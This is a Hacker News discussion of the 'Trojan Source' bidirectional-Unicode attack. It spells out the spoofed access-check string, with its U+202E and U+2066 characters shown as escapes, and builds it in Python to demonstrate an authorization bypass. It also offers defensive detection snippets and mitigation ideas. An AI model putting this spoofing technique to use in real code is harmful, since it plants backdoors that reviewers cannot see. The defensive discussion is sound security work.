[HN Gopher] 'Trojan Source' Bug Threatens the Security of All Code
       ___________________________________________________________________
        
       'Trojan Source' Bug Threatens the Security of All Code
        
       Author : picture
       Score  : 442 points
       Date   : 2021-11-01 04:24 UTC (18 hours ago)
        
 (HTM) web link (krebsonsecurity.com)
 (TXT) w3m dump (krebsonsecurity.com)
        
       | jwilk wrote:
       | Another HN discussion:
       | 
       | https://news.ycombinator.com/item?id=29061987
        
       | pabs3 wrote:
       | Are there any linters that detect these sorts of issues?
        
       | marcodiego wrote:
       | I thought this was a case of a source code virus [1]. With the
       | current popularity of open source and services like GitHub,
       | combined with deep inter-dependencies in Node.js, a virus of this
       | kind could have a huge impact if unnoticed for long enough.
       | 
       | Maybe it is the next plague waiting to happen?
       | 
       | [1] https://en.wikipedia.org/wiki/Source_code_virus
        
       | qwerty456127 wrote:
       | Although I'm not a native English speaker, and I meant almost all
       | the programs I ever wrote to be capable of processing any given
       | language (and also to have localized UIs in some cases), I see no
       | reason for non-English strings to be allowed in source code and
       | code files, except in some ad-hoc scripts where hard-coding some
       | text can be an optimal solution.
       | 
       | We probably just need a git switch which would make it throw an
       | error if it encounters Bidi or any weirdness like that except in
       | resource files.
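       |
       | A minimal sketch of the kind of check a hook or linter could
       | run, assuming the flagged set is the nine bidi embedding,
       | override and isolate controls (U+202A to U+202E, U+2066 to
       | U+2069). The name find_bidi_controls is made up for
       | illustration; it is not an existing git option or tool:

```python
import unicodedata

# Bidirectional control characters: embeddings, overrides, isolates and
# their terminators (U+202A..U+202E and U+2066..U+2069).
BIDI_CONTROLS = {
    chr(cp) for cp in (*range(0x202A, 0x202F), *range(0x2066, 0x206A))
}


def find_bidi_controls(text):
    """Return (line_number, column, character_name) for each bidi control."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                hits.append((line_no, col, unicodedata.name(ch)))
    return hits


# A line that hides a RIGHT-TO-LEFT OVERRIDE inside a string literal.
sample = 'ok\nif x != "user\u202e" {'
for line_no, col, name in find_bidi_controls(sample):
    print(f"line {line_no}, column {col}: {name}")
```

       | A pre-commit hook could run this over every staged file outside
       | the resource directories and refuse the commit when the list is
       | non-empty.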
        
         | mkl wrote:
         | Non-English characters are quite useful in comments where
         | you're explaining Unicode processing stuff, and in regexes
         | working with the characters, and when you're using maths
         | notation (proper symbols in comments, Greek letters for
         | variables, etc.), and when you're drawing boxes in a terminal.
         | I'm sure there are many more too.
        
           | qwerty456127 wrote:
           | I omitted this to keep it simple (this is why I wrote non-
           | English rather than non-ASCII, I actually am a proponent of
           | active usage of proper Unicode symbols like =, [?], etc, and
           | also TUIs) but yes, I would prefer a rather extended English
           | char-set including Greek letters, mathematical symbols,
           | pseudographics etc. These can be useful and are not much
           | trickier than English letters. But I would certainly like to
           | see at least a warning (I would even prefer an Error
           | actually) if my code file includes anything related to RTL,
           | complex character composition or non-Latin letters other than
           | Greek.
        
         | samus wrote:
         | Since most programming languages are based on English, non-
         | English text in string literals is almost always user-facing
         | and should be put in resource files to make translation into
         | additional languages easier.
         | 
         | Identifiers and comments are a serious problem though. Many
         | application domains use terms that are tricky to translate into
         | English. The translations could be misleading, inappropriate or
         | not unique. Sometimes they are just plain wrong or there is no
         | English word that fits. All of these could cause
         | misconceptions, confusion and bugs, and make reading and
         | working with the code and the running system harder.
        
           | qwerty456127 wrote:
           | So you mean you can write a program and be unable to explain
           | what it does in plain English?
        
           | josephcsible wrote:
           | > Many application domains use terms that are tricky to
           | translate into english.
           | 
           | What if instead of translating those terms to English, you
           | just transliterated them to the Latin alphabet?
        
       | dwheeler wrote:
       | As I previously noted on a related post:
       | 
       | Interesting paper. Note, however, that the general problem is
       | already known and there are a number of pre-existing works that
       | discuss it. This is typically called "underhanded code" or
       | sometimes "maliciously misleading code". I'm surprised that they
       | didn't use the normal term for the problem nor cite the previous
       | work on it - maybe they didn't realize this was a widely-known
       | problem? Previous works on underhanded code didn't discuss Bidi
       | to my knowledge (though other attacks on text like this have
       | exploited Bidi). Here are a number of other materials about
       | underhanded code:
       | 
       | The Obfuscated V Contest
       | (http://graphics.stanford.edu/~danielh/vote/vote.html) was
       | created by Daniel Horn in 2004 and is the earliest "underhanded"
       | programming contest that I found. It was a contest to create
       | source code that looked like it did one thing, but actually did
       | another.
       | 
       | Underhanded C Contest (http://www.underhanded-c.org/) has run for
       | many years. Per its FAQ, "The Underhanded C Contest is an annual
       | contest to write innocent-looking C code implementing malicious
       | behavior."
       | 
       | My PhD dissertation "Fully Countering Trusting Trust through
       | Diverse Double-Compiling" discusses how to counter the "trusting
       | trust" problem & includes a section about maliciously misleading
       | source code. See: https://dwheeler.com/trusting-trust/
       | 
       | The JavaScript Misdirection Contest announced the winner on
       | September 27, 2015 http://misdirect.ion.land/
       | 
       | My paper "Initial Analysis of Underhanded Source Code", (by David
       | A. Wheeler, April, 2020, IDA document: D-13166), discusses
       | underhanded code and the effectiveness of several potential
       | countermeasures. It also includes a number of citations to other
       | works on underhanded code. https://www.ida.org/research-and-
       | publications/publications/a...
        
         | kfichter wrote:
         | First place winner of last year's underhanded Solidity contest
         | used exactly this trick:
         | https://blog.soliditylang.org/2020/12/03/solidity-underhande...
        
           | axic wrote:
           | There was a related issue in 2018 regarding line endings, which
           | would allow disguising some lines as code while keeping them as
           | comments: https://docs.google.com/document/d/1PZBSCBWBwd6AqWC
           | gXqLnw8FN...
           | 
           | Both of these were fixed in Solidity shortly after the bug
           | reports.
           | 
           | (P.S. I'm a member of the Solidity team)
        
         | taviso wrote:
         | It's also worth noting that if you're caught playing games like
         | this, there is really no way to explain your actions that would
         | avoid serious consequences.
         | 
         | If however, you used the "bugdoor" method, you can plausibly
         | deny any malicious intent and you will absolutely get away with
         | it.
        
       | ChrisMarshallNY wrote:
       | Looks like avoiding dependencies and snippets is a good way to
       | mitigate this.
       | 
       | In my own work, I use almost no dependencies (aside from
       | compilers and built-in APIs). Scratch that. I use a _lot_ of
       | dependencies, but ones that I have written, and generally rewrite
       | snippets, when I use them.
       | 
       | Also, very little of the code I see, has comments.
       | 
       | Like, _any_ comments; even headerdoc comments.
       | 
       |  _> Green said the good news is that the researchers conducted a
       | widespread vulnerability scan, but were unable to find evidence
       | that anyone was exploiting this. Yet._
       | 
       | ... "yet" ...
       | 
       | I know that I'm a "dependency curmudgeon," but stuff like this
       | just serves to reinforce my posture.
        
         | Cthulhu_ wrote:
         | But what if this is slipped into your compiler? Your operating
         | system's kernel? A top voted Stack Overflow answer? You can't
         | (or it's infeasible to) check and control everything.
        
         | _3u10 wrote:
         | Yes, you're totally safe then. I've never heard of standard
         | libraries having problems that affect security, certainly not
         | the str* family of functions.
        
           | ChrisMarshallNY wrote:
           | Any particular reason for the nasty? I thought we didn't do
           | that kind of thing, around these parts, but I'm often wrong.
        
             | _3u10 wrote:
             | The pain of having worked under these conditions of not
             | using libraries, usually having to work with subpar
             | libraries that were developed internally.
             | 
             | Like oh, hey, we need a database, great, let's roll our own.
             | Or the ancient version of whatever lib shipped with the OS
             | that is full of bugs solved in subsequent versions.
             | 
             | I see that you now use a lot of dependencies, and retract
             | my statement.
        
         | ChrisMarshallNY wrote:
         | sigh...Why does it have to be "all or nothing"? These logical
         | fallacies are pretty much a standard in these discussions.
         | 
         | Either have 100%, ironclad security, or "Who cares? YOLO! STDs
         | be damned" abandon?
         | 
         | We do what we can to make sure what _we_ write is as good as
         | possible.
         | 
         | I lock my car door, when I get out. I know that it won't stop a
         | determined thief, but it will avoid problems from the casual
         | knucklehead.
        
       | WalterBright wrote:
       | Homoglyphs are a disaster and should never have been admitted
       | into Unicode. There should never have been invisible semantic
       | information embedded in Unicode.
        
       | josephcsible wrote:
       | Why is bidirectionality handled when text is being rendered onto
       | the screen, instead of when it's being input from the keyboard?
       | Why not render every single character in LTR order, and have RTL
       | support instead be handled by text input fields moving the cursor
       | in the opposite direction after each RTL character is typed? (I
       | know it's too late to change this now. I'm asking why we didn't
       | do it this way from the beginning.)
        
         | jart wrote:
         | If I understand correctly, what you're suggesting could be
         | thought of as pre-rendering directionality into the memory
         | layout. If we did that then it might compromise our ability to
         | write an algorithm that iterates over a string of Hebrew or
         | Arabic characters. Display is super complicated and people
         | don't agree on how to do it. For example, consider the Arabic
         | text `wd@ 'bw tyh. If I sneak a Latin A between all those
         | characters to prevent the display algorithm from rearranging
         | and shaping them, then that same string looks like this:
         | `AwAdA@A'AbAwAtAAyAh. Those are the same characters and you can
         | confirm that yourself using:
         |
         |     import unicodedata
         |     for c in "`wd@ 'bw tyh":
         |         print(unicodedata.name(c))
         | 
         | On the other hand if you want to romanize that string as EWDTA
         | AEBW TAIH then all you need is a for loop and a switch
         | statement, because the memory order is always left to right. We
         | can also rest assured that if someone invents a better display
         | algorithm, we won't need to do any database migrations, since
         | the encoding itself doesn't need to change.
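         |
         | To make the for-loop point concrete, here is a rough sketch.
         | The Arabic string is an assumption reconstructed from the
         | romanization above and written as escapes, and the ROMAN table
         | is a made-up mapping, not a standard transliteration scheme:

```python
import unicodedata

# Assumed original text, spelled with escapes so the logical (memory)
# order is unambiguous regardless of how an editor displays it.
TEXT = "\u0639\u0648\u062f\u0629 \u0623\u0628\u0648 \u062a\u0627\u064a\u0647"

# Hypothetical romanization table, chosen only to reproduce the
# romanized form quoted in the comment.
ROMAN = {
    "\u0639": "E",   # ARABIC LETTER AIN
    "\u0648": "W",   # ARABIC LETTER WAW
    "\u062f": "D",   # ARABIC LETTER DAL
    "\u0629": "TA",  # ARABIC LETTER TEH MARBUTA
    "\u0623": "AE",  # ARABIC LETTER ALEF WITH HAMZA ABOVE
    "\u0628": "B",   # ARABIC LETTER BEH
    "\u062a": "T",   # ARABIC LETTER TEH
    "\u0627": "A",   # ARABIC LETTER ALEF
    "\u064a": "I",   # ARABIC LETTER YEH
    "\u0647": "H",   # ARABIC LETTER HEH
}


def romanize(text):
    """Map each character in memory order; no reordering is needed."""
    return "".join(ROMAN.get(ch, ch) for ch in text)


print(romanize(TEXT))  # EWDTA AEBW TAIH
print(unicodedata.name(TEXT[0]))  # ARABIC LETTER AIN
```

         | The loop never has to know about display direction, which is
         | the property being argued for.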
        
         | swiftcoder wrote:
         | If you have a document with mixed languages, you need to be
         | able to edit each language in its natural direction after the
         | fact. That requires storing directionality in the document.
         | 
         | And keep in mind that if you store RTL text backwards, as you
         | propose, every algorithm now has to be able to process
         | backwards text. Backwards spellcheck is a lot of extra work...
        
         | laurowyn wrote:
         | Because visual representation is separate from the underlying
         | data structure. A string container doesn't have a specific
         | direction, only a relative one. I.e. This character comes
         | before the next and after the previous. Adding the bidi control
         | code, the string indicates when the visual ordering changes in
         | this relative direction system.
         | 
         | You could absolutely design a new string container that assumes
         | left to right at all times and cannot be changed, but then it's
         | on the programmer to ensure that strings are copied or
         | concatenated in the right direction, at the right location, and
         | substring searching becomes a minor headache. How would you
         | concatenate an RTL string to a forced LTR string
         | representation? You would have to work out whether the end of
         | the string is LTR or RTL. If LTR, append directly. If RTL, find
         | the character where the direction changes and insert the string
         | in there - much more expensive. Better to just append the
         | string, using bidi codes where required, and let the frontend
         | process the string to make the appropriate direction changes.
         | Yes, you may need to search the string for the bidi code to
         | know which direction you're going at the end of the string, but
         | that's just a simple reverse string search for a single control
         | character, and not a complex variable multi-byte search of
         | inferred character directions by codepoint values.
         | 
         | I think the issue is in the locations in which bidi codes are
         | rendered. They lend an inherent untrustworthiness to the
         | text area they're rendered in, and so should be treated as an
         | exception in critical situations. I've seen the reversed exe
         | file name trick used for years, and every time I ask myself why
         | that's even a thing? If the OS used file headers and magic
         | numbers to determine file types instead of the filename, it
         | would be less of an issue.
         | 
         | For source code, I would question the rendering of RTL text in
         | a source code editor as it's an obvious issue for code safety.
         | Ideally, all source code would be kept to the same origin
         | language - doesn't have to be English, just consistent. Any
         | non-conforming text should ideally be loaded from a resource
         | rather than inline within the source code, to avoid foreign
         | character contamination and allow easier identification of
         | these issues. Further, source code rendering should only render
         | identified safe control codes, and treat unsafe ones as raw
         | binary values to be shown as such - i.e. \r and \n are safe, \b
         | is unsafe, and bidi codes would also be unsafe. You could even
         | go so far as to include them in the syntax highlighting, but
         | that results in a dependency on syntax highlighting to show the
         | semantics of the source code rather than the text alone.
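         |
         | A rough sketch of that rendering rule, assuming the Unicode
         | general categories Cc (control) and Cf (format) are a
         | reasonable stand-in for "control codes", and that tab is
         | treated as safe alongside \r and \n. show_controls is a
         | hypothetical name, and the <U+XXXX> notation is just one
         | possible way to show the raw value:

```python
import unicodedata

# Controls that are rendered normally. \r and \n come from the comment;
# including \t is an extra assumption.
SAFE_CONTROLS = {"\n", "\r", "\t"}


def show_controls(text):
    """Replace every unsafe control or format character with <U+XXXX>."""
    out = []
    for ch in text:
        # Cc covers characters like \b; Cf covers the bidi codes.
        if unicodedata.category(ch) in ("Cc", "Cf") and ch not in SAFE_CONTROLS:
            out.append(f"<U+{ord(ch):04X}>")
        else:
            out.append(ch)
    return "".join(out)


print(show_controls('if level != "user\u202e \u2066// Check if admin\u2069 \u2066" {'))
```

         | This is blunt: Cf also covers characters such as the zero-width
         | joiner, so a real editor would likely want a finer-grained list.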
        
         | [deleted]
        
         | malf wrote:
         | Flip left and right in your idea, and you can try it out
         | without learning a new language. Remember to implement word
         | wrap.
        
       | fullstackchris wrote:
       | I fail to see how this can actually be used as an exploit. As
       | some commenters have said, yes, it may be a risk to some open
       | source tools where there is poor due diligence in the merge
       | request review process - but that is almost never the case.
       | 
       | Otherwise, if you own your own code, this obviously isn't an
       | issue. (Unless, of course, for some reason you want to program
       | exploits into software at your organization :) )
       | 
       | Heck, even GitHub already shows a warning for files that have bi-
       | directional unicode...
       | 
       | A bit of an overemotional title if you ask me.
        
         | pietroalbini wrote:
         | It's this research that prompted GitHub to show warnings; they
         | weren't there as of yesterday.
        
         | willvarfar wrote:
         | https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html has a
         | nice clear example.
         | 
         | Full Stack Chris reviews some code that he thinks says:
         | if access_level != "user" { // Check if admin
         | 
         | This may be an open source project. This may be an internal bad
         | egg (a very common threat; insider jobs are actually one of the
         | absolute top risks to a company). Or this code may be injected
         | by an attacker who has gained access to the repo and is leaving
         | backdoors that they hope to survive long after their access is
         | blocked or leaving backdoors to make deployed production
         | systems vulnerable. Etc.
         | 
         | And Chris won't notice that the computer will execute:
         | if access_level != "user{U+202E} {U+2066}// Check if
         | admin{U+2069} {U+2066}" {
         | 
         | This is not just an attack on compiled languages. Scripting
         | languages are just as vulnerable.
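         |
         | The same string can be built explicitly to see what the
         | computer compares against. This is a sketch in Python rather
         | than Rust, with the control characters written as escapes;
         | is_granted is a hypothetical stand-in for the check in the
         | example:

```python
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE
LRI = "\u2066"  # LEFT-TO-RIGHT ISOLATE
PDI = "\u2069"  # POP DIRECTIONAL ISOLATE

# The string literal as it is actually stored in the source file: the
# apparent comment sits inside the quotes.
literal = "user" + RLO + " " + LRI + "// Check if admin" + PDI + " " + LRI


def is_granted(access_level):
    """Mirror the `!=` check; True means the guarded branch runs."""
    return access_level != literal


print(is_granted("user"))  # True
print(ascii(literal))      # shows the hidden characters as escapes
```

         | A plain "user" no longer equals the literal, so the branch that
         | looked reserved for admins runs for ordinary users.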
        
           | kiklion wrote:
           | Sorry, still don't get it.
           | 
           | Isn't the issue that they are using magic strings? If the
           | strings were something like RoleConstants.Admin then this is
           | avoided?
           | 
           | Though I don't understand the point of the Unicode characters
           | in the comment string so I must be missing something.
        
             | tzs wrote:
             | > Though I don't understand the point of the Unicode
             | characters in the comment string so I must be missing
             | something.
             | 
             | There is no comment string.
        
               | kiklion wrote:
               | So after reading other parts, I get where I was mistaken
               | but still believe proper coding practices of avoiding
               | magic strings would avoid many of the potential issues.
               | 
               | My mistake was thinking the initial Unicode character was
               | changing the comparison string the way a non-printable
               | character could. Instead, it flips the ordering so
               | that the comment is part of the comparison string and
               | then the string is terminated.
        
           | sethammons wrote:
           | And the dev wrote test cases (negative ones too!). The test
           | fails and shows admin privileges for the normal user.
           | Debugging ensues. I'd hope.
        
             | wizzwizz4 wrote:
             | The test has the same kind of change. It passes, and nobody
             | thinks to look at the obviously-correct code.
        
       | throw10920 wrote:
       | Or, hear me out - instead of trying to work around a legitimate
       | _feature of Unicode_, you could stop _storing your source code
       | as text_, because it _isn't_. _Code is not text_ - it's a tree
       | of objects, and representing it as a flat sequence of text
       | characters causes _many_ problems and inefficiencies (including
       | this one!) that could be mitigated if you _just stored and
       | manipulated it as a tree_.
       | 
       | The only reason why text was justifiable as a storage and
       | manipulation format for code in the first place was because early
       | computers (probably?) couldn't handle a tree format. That excuse
       | has been invalid for several decades now, as is the idea that
       | "everything is plain text". Code _isn't_ plain text - if it was,
       | then you could make arbitrary edits without syntax errors, but
       | you can't, because code has _structure_. Start treating it that
       | way.
        
         | shaunxcode wrote:
         | Yes! This would also do away with a whole class of conflicts
         | related to whitespace/formatting.
        
           | throw10920 wrote:
           | Exactly! Imagine a version control system where you get diffs
           | on the AST, instead of the characters that make up the
           | source (add an `if` and suddenly dozens of lines have
           | "changed"), or the tabs/spaces flamewar evaporating
           | instantly.
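           |
           | As a small illustration, Python's standard ast module can
           | already compare two sources by structure rather than by
           | characters. This is only a sketch of the idea, not a version
           | control system, and same_structure is a made-up helper:

```python
import ast


def same_structure(source_a, source_b):
    """True when both sources parse to the same syntax tree."""
    # ast.dump omits line and column attributes by default, so layout
    # differences do not show up in the comparison.
    return ast.dump(ast.parse(source_a)) == ast.dump(ast.parse(source_b))


tabs = "def f(x):\n\treturn x + 1\n"
spaces = "def f(x):\n    return x  +  1\n"
changed = "def f(x):\n    return x + 2\n"

print(same_structure(tabs, spaces))   # True
print(same_structure(tabs, changed))  # False
```

           | ast drops comments and formatting entirely, so a real tool
           | would need a tree that preserves them.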
        
         | scintill76 wrote:
         | Also helps with naming. Only need a value once or twice? Don't
         | bother trying to name it, just link it into the tree where it's
         | needed.
        
         | rocqua wrote:
         | The thing about text is that it is barebones. Everyone can
         | agree what the structure of text is (a stream of bytes with
         | some ASCII-like encoding).
         | 
         | For representing code as more than text, you will lose so many
         | tools that can handle your code, it's a massive setback. Add
         | to that how much effort it takes to get people onboarded on
         | your new representation, and things look bleak for adoption.
         | 
         | Finally, programmers really like looking under the hood. And
         | with plain text, you know exactly what your code looks like in
         | bytes.
        
           | throw10920 wrote:
           | > The thing about text is that it is barebones.
           | 
           | That's a bug. Programming is _hard_, and you want the best,
           | most powerful tools you can get to handle it - which means
           | putting effort into making _specialized_ tools instead of
           | using generic ones like text editors.
           | 
           | > For representing code as more than text, you will lose so
           | much tools that can handle your code, it's a massive set
           | back.
           | 
           | _No_ tools existed without first being built, so this isn't
           | special. Rust didn't have any tools before people started
           | building tools for it, for instance.
           | 
           | Moreover, the tools that we have now that are text-specific
           | are _pathetic_. You can view the first _n_ lines of a file?
           | Wow, very impressive /s. More complex things like grep are
           | just as realizable in a structure editor, and in order to use
           | them for non-trivial stuff, you'd have to write structural
           | regular expressions and implement mini-parsers _anyway_ -
           | things you would get for free if you just kept code as
           | structure.
           | 
           | > Add to that how much effort it takes to get people
           | onboarded on your new representation, and things look bleak
           | for adoption.
           | 
           | You're misreading my argument. I'm not saying that people
           | _will_ adopt structured code (a descriptive statement), I'm
           | saying that people _should_ adopt structured code (a normative
           | statement) because it'll be much better for them.
           | 
           | Also, you're making the assumption that onboarding is hard,
           | and that compatibility layers can't exist - neither of which
           | is true.
           | 
           | > Finally, programmers really like looking under the hood.
           | And with plain text, you know exactly what your code looks
           | like in bytes.
           | 
           | The average programmer probably looks at their code with a
           | hex editor once in their life - this isn't really a good
           | argument. Moreover, the vast majority of programmers already
           | tolerate _not_ looking under the hood in dozens of different
           | ways - most use VMs like CPython/JVM/JS VMs, opaque
           | frameworks like React/Angular, graphics APIs like
           | OpenGL/DirectX/Vulkan, complicated editors like Visual Studio
           | Code/Emacs, and far more without ever looking under the hood
           | of _any_ of those - so there's no reason not to add another
           | layer (especially because you can build that layer to be easy
           | to peer through) for the sake of productivity.
        
       | ziml77 wrote:
       | Would the solution to this be to render the direction switch
       | control character similar to how some text editors will render 0
       | bytes as a glyph with the text NUL? You could still render
       | everything after it with the reversed direction, but it provides
       | a visible indicator that it's been done. It might be a little
       | annoying for people who use RTL languages, but it seems like the
       | benefit may outweigh that.
        
       | simmo9000 wrote:
       | Here is an example, open it in an appropriate editor (vi) and you
       | can see how easy it is to 'exploit' (if you can call it that?).
       | 
       | https://github.com/nickboucher/trojan-source/blob/main/JavaS...
       | 
       | Seems like a layer 8 problem?
        
         | brundolf wrote:
         | GitHub has already updated their UI I see
        
           | techsolomon wrote:
           | Changelog - https://github.blog/changelog/2021-10-31-warning-
           | about-bidir...
        
           | Groxx wrote:
           | The Android app renders it much more suspiciously too, though
           | unfortunately no warning: https://imgur.com/a/L3sNFQ8
        
         | Semaphor wrote:
         | In case there are people who (currently) don't have access to
         | such an editor, here is a screenshot:
         | https://i.imgur.com/2Ue2Vvd.png
        
         | siddhesh wrote:
         | You mean, like this?
         | 
         | https://imgur.com/a/unKuOoK
         | 
         | Snark aside, most text based editors have some giveaway or
         | another. Even the GUI ones show syntax highlighting quirks that
         | show that something is wrong.
         | 
         | This is only really relevant in unicode-aware terminals,
         | without syntax highlighting and when you don't get to scroll
         | between characters. IOW, it's really quite hard to do.
        
       | z29LiTp5qUC30n wrote:
       | The bootstrappable community already produced a solution for
       | this:
       | https://github.com/oriansj/stage0/blob/master/High_level_pro...
        
       | samus wrote:
       | It may be worth taking a step back and taking a new look at the
       | underlying problem.
       | 
       | Source code combines multiple kinds of text. There are
       | 
       | * hierarchical structure,
       | 
       | * mathematical and logical syntax
       | 
       | * literals (especially insidious: text)
       | 
       | * free text in comments and
       | 
       | * markup in documentation
       | 
       | These newly discovered vulnerabilities remind me of the issue of
       | SQL injection, which is also caused by a confusion when combining
       | these kinds of text.
       | 
       | For SQL injection, the solution was to introduce facilities to
       | explicitly combine SQL syntax and dynamic literals. Maybe we need
       | something similar for code that enforces such strict separation.
       | Maybe into different files or nested into a container format.
       | There are already facilities for doing so (resource files,
       | templating languages) but they are opt-in and don't go far enough
       | to address the newly discovered problems.
       | 
       | The cost would be that code could become more difficult to edit
       | with plain-text editors.
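       |
       | For reference, the SQL-side separation looks roughly like this
       | with Python's sqlite3 module, where the query text and the
       | literal travel separately. The table and the find_role helper
       | are invented for the example:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("alice", "admin"), ("bob", "user")],
)


def find_role(name):
    """Look up a role; `name` is bound as data, never spliced into SQL."""
    row = conn.execute(
        "SELECT role FROM users WHERE name = ?", (name,)
    ).fetchone()
    return row[0] if row else None


print(find_role("bob"))             # user
print(find_role("bob' OR '1'='1"))  # None
```

       | The injection attempt is treated as an odd user name rather
       | than as syntax, which is the kind of enforced separation the
       | comment is asking for in source code.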
        
       | pdonis wrote:
       | This article talks about compilers, but what about interpreted
       | languages like Python or Lisp?
        
       | metroholografix wrote:
       | Emacs "fix": (setq bidi-display-reordering nil) in relevant
       | modes.
        
         | perihelions wrote:
         | I forced it globally, are there reasons that's bad to do?
         | (setf (default-value 'bidi-display-reordering) nil)
         | 
         | The BIDI issue looks pretty bad in emacs-gtk: the sneaky text
         | is unnoticeable in lots of modes, unless the cursor just
         | happens to scroll over it.
        
         | josephcsible wrote:
         | Why did you put "fix" in quotes? Isn't that an actual fix for
         | this?
        
           | cestith wrote:
           | It's more of a workaround that breaks things for people
           | legitimately using RTL strings isn't it?
        
       | zeepzeep wrote:
       | The good old SexyHexe.pdf strikes again.
       | 
       | These problems won't go away for a while, Unicode is fucking
       | hard. Almost every app I ever tried it on had at least some
       | problems with %u202E (the right-to-left override).
        
       | jeroenhd wrote:
       | It all depends on your IDE. I've tried this, and IntelliJ and
       | friends will show a little block with the text RLO for the right-
       | to-left override or ZWS for zero-width space for any non-standard
       | character that might mess things up. (Neo)vim will show the
       | Unicode escape sequence instead of rendering the text as Unicode
       | directs it.
       | 
       | Some compilers, notably clang, will warn you that you're using an
       | "invisible character". Assuming you at least read the warnings
       | your code generates (because if you don't, why not just put
       | exploitable algorithms deep down in the software?) you'd probably
       | catch the issue.
       | 
       | Simpler programs such as the text editor that ships with GNOME
       | will freak out, but I don't think most people are coding in that
       | in the first place.
       | 
       | I think this is an interesting peculiarity, but it's not a
       | "threat" to "the security of all code".
        
         | [deleted]
        
         | aulin wrote:
         | I'd say that neovim is bugged here and gedit is the one working
         | properly rendering unicode as it should be
        
       | tannhaeuser wrote:
       | Unicode, with its extremely large character set, was never going
       | to be a solution to any and all character encoding problems in
       | itself. Usually, for a given document you'll want to
       | declare the subset that's actually in use such that a particular
       | font with necessarily limited coverage can be used to render it.
       | That's what's available for SGML markup documents, e.g. in an SGML
       | declaration, where you can declare and construct a document
       | character set from planes or arbitrary code point ranges, and an
       | SGML parser can verify actual content against that subset.
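       |
       | The idea of checking content against a declared subset can be
       | sketched outside SGML too. The following is not SGML
       | declaration syntax; the ranges and the name
       | outside_declared_set are assumptions picked for illustration:

```python
# Hypothetical declared character set, as inclusive code point ranges.
ALLOWED_RANGES = [
    (0x0009, 0x000A),  # tab and line feed
    (0x0020, 0x007E),  # printable ASCII
    (0x0370, 0x03FF),  # Greek and Coptic block
]


def outside_declared_set(text, ranges=ALLOWED_RANGES):
    """Return (index, 'U+XXXX') for every character not in any range."""
    return [
        (index, f"U+{ord(ch):04X}")
        for index, ch in enumerate(text)
        if not any(low <= ord(ch) <= high for low, high in ranges)
    ]


print(outside_declared_set("\u03b1 = 1\n"))  # []
print(outside_declared_set("a\u202eb"))      # [(1, 'U+202E')]
```

       | With a declaration like this, a bidi override is rejected simply
       | because nobody listed it, rather than because a tool knew to
       | look for it.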
        
         | froh wrote:
         | Was that capability dropped in the transition from sgml to XML?
         | If so, can someone here on HN provide some pointers to the old
         | discussion?
        
           | tannhaeuser wrote:
           | All discussion related to creating XML as an SGML subset can be
           | found on the xml-dev mailing list [1], with some earlier
           | discussions and initial drafts of the SGML ERB mostly linked
           | from there.
           | 
           | The capability to declare document character sets was dropped
           | along with supporting an SGML declaration altogether.
           | 
           | [1]: http://lists.xml.org/archives/xml-dev/
        
       | Gunax wrote:
       | I am still confused. Is the text not visible?
       | 
       | If I write some text in a comment, it should still be visible,
       | regardless of direction/bidi code, right?
        
       | aww_dang wrote:
       | I filed this domain away under 'security alarmist nonsense' years
       | ago. This headline and story are prime examples of the form.
        
         | sydthrowaway wrote:
         | Seriously. State run espionage is 100x more likely
        
       | mmastrac wrote:
       | Fun story: I discovered these in the early 2000s and
       | simultaneously discovered that Slashdot didn't filter these out.
       | I spent an evening randomly reversing large sections of comment
       | pages until they finally blocked it.
       | 
       | I'm very, very sorry CmdrTaco.
        
         | kingcharles wrote:
         | Most web sites' comment sections will allow these. I think even
         | Facebook allows tomfoolery like this.
         | f[?][?][?][?]e[?][?][?][?]a[?][?][?]r[?][?][?][?]
         | [?][?][?][?]t[?]h[?][?][?][?]e[?] [?]u[?][?][?][?][?]t[?][?][?]
         | f[?][?]8[?]m[?][?][?][?][?][?]a[?][?][?][?]n[?][?][?]
        
           | Cthulhu_ wrote:
           | I've seen some sites / services (Discord?) filter these out,
           | at least to the point where they don't escape a message's
           | vertical space. I'm sure they're truncated because those
           | messages are pretty big in terms of amount of bytes.
           | 
           | And while they have valid use cases, I can't see it in e.g.
           | comment sections or chat messages. Happy to have someone link
           | to e.g. a Vietnamese comment section showing practical use
           | though.
        
             | Timwi wrote:
             | Vietnamese Wikipedia has plenty of Talk pages with
             | discussion threads.
        
           | scatters wrote:
           | Well yes, Facebook has users in Vietnam. Stacked diacritics
           | are a feature, not a bug.
        
       | SavantIdiot wrote:
       | This exploit requires comments.
       | 
       | I think most code is safe.
        
       | pweezy wrote:
       | It's not the same thing, but brings to mind Ken Thompson's famous
       | "Reflections on Trusting Trust" [0] from 1984.
       | 
       | That describes a concept, over several stages, where a compiler
       | can be made to change the behavior of programs it compiles in a
       | difficult-to-find way.
       | 
       | [0]:
       | https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...
        
       | kens wrote:
       | This reminds me of a trick you could do on the Commodore PET in
       | the 1980s, where you'd embed backspaces in your BASIC code. If
       | someone looked at the code they'd see something different from
       | what gets executed. Effective to keep someone from copying your
       | code in class :-)
        
       | TruthWillHurt wrote:
       | Is this a real cause for concern? Simply don't copy code with
       | strange unicode characters, just like you don't copy code with
       | blocks of bytecode.
        
         | mkl wrote:
         | The point of the vulnerability is that you can't necessarily
         | see the strange Unicode characters.
        
         | samus wrote:
         | It's a problem in any environment where people can input
         | Unicode characters. Reviewers might use tools that are not able
         | to see those things.
         | 
         | At the same time, one can't just put a blanket ban on Unicode.
         | It exists for a reason. People _want_ to use their native
         | languages to name identifiers, or at least to write comments.
         | Restricting ourselves to ASCII again and thus forcing English
         | on everybody is not a solution.
        
           | lixtra wrote:
           | > Restricting ourselves to ASCII again and thus forcing
           | English on everybody is not a solution.
           | 
           | Yet most programming languages force them to use English
           | Arabic numbers.
           | 
           | Wouldn't it be great to use Roman numerals?
           | 
           | And then images in source code are really difficult to
           | handle. Wouldn't it be nice to compile a word document with
           | embedded images?
           | 
           | I think I wouldn't mind staying with ASCII for source code,
           | except for string literals (difficult enough).
        
       | TacticalCoder wrote:
       | Honest question: would it be _that_ bad to mandate and enforce
       | 100% ASCII source files? Arguably every and any Unicode character
       | and, well, arguably even any string of characters can (should?)
       | go to a properties/resources file (properties/resources files
       | which, btw, also greatly simplify i18n/l10n).
       | 
